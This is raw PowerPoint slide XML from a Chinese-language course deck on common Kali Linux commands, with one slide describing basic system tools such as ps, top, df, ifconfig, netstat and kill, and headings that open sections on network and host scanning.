              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Kali Linux常用命令</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="936625" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>步骤一 </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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21" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali Linux常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751195" y="939800"/>
            <a:ext cx="5828030" cy="4276725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.系统管理命令</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>stat		显示指定文件的详细信息，比ls更详细</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>who		显示在线登录用户</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>whoami	显示当前操作用户</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>hostname	显示主机名</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>uname		显示系统信息</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>top		动态显示当前耗费资源最多进程信息</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ps		显示瞬间进程状态ps-aux</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>du	查看目录大小du-h /home带有单位显示目录信息</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>df	查看磁盘大小df-h带有单位显示磁盘信息</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ifconfig		查看网络情况</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ping		测试网络连通</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>netstat		显示网络状态信息</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>man		命令不会用了?用man指令,如man ls</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>clear		清屏</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>kill	杀死进程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可以先用ps 或 top命令查看进程的ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>然后再</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr sz="1600">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>用kill命令杀死进程</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1847711" y="1845636"/>
            <a:ext cx="2926715" cy="1638300"/>
            <a:chOff x="280807" y="-427279"/>
            <a:chExt cx="3055299" cy="2252704"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="280807" y="-427279"/>
              <a:ext cx="3055299" cy="2252704"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1415026" y="-203755"/>
              <a:ext cx="1187251" cy="1482594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596789" y="1989833"/>
            <a:ext cx="7328535" cy="1258570"/>
            <a:chOff x="3663165" y="953426"/>
            <a:chExt cx="5496401" cy="1108953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4060358" y="1005461"/>
              <a:ext cx="4914900" cy="622737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3663165" y="953426"/>
              <a:ext cx="5496401" cy="1108953"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3531870"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="4331970"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
